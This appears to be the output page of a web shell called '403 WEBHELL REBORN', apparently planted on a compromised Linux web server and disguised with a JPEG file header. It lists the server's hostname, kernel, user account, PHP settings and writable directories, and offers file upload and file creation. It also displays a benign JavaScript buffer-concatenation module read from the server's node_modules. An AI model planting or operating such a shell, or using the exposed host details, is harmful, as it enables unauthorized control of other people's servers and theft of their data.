ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux cloud.heroica.com.br 4.18.0-553.36.1.el8_10.x86_64 #1 SMP Wed Jan 22 03:07:54 EST 2025 x86_64
User : farolpborg ( 1053)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /var/www/node_services/apimetaexamepopular/node_modules/@jsonjoy.com/util/lib/buffers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : //var/www/node_services/apimetaexamepopular/node_modules/@jsonjoy.com/util/lib/buffers/concat.js
"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
exports.listToUint8 = exports.concatList = exports.concat = void 0;
const concat = (a, b) => {
    const res = new Uint8Array(a.length + b.length);
    res.set(a);
    res.set(b, a.length);
    return res;
};
exports.concat = concat;
const concatList = (list) => {
    const length = list.length;
    let size = 0, offset = 0;
    for (let i = 0; i < length; i++)
        size += list[i].length;
    const res = new Uint8Array(size);
    for (let i = 0; i < length; i++) {
        const item = list[i];
        res.set(item, offset);
        offset += item.length;
    }
    return res;
};
exports.concatList = concatList;
const listToUint8 = (list) => {
    switch (list.length) {
        case 0:
            return new Uint8Array(0);
        case 1:
            return list[0];
        default:
            return (0, exports.concatList)(list);
    }
};
exports.listToUint8 = listToUint8;
//# sourceMappingURL=concat.js.map

Anon7 - 2021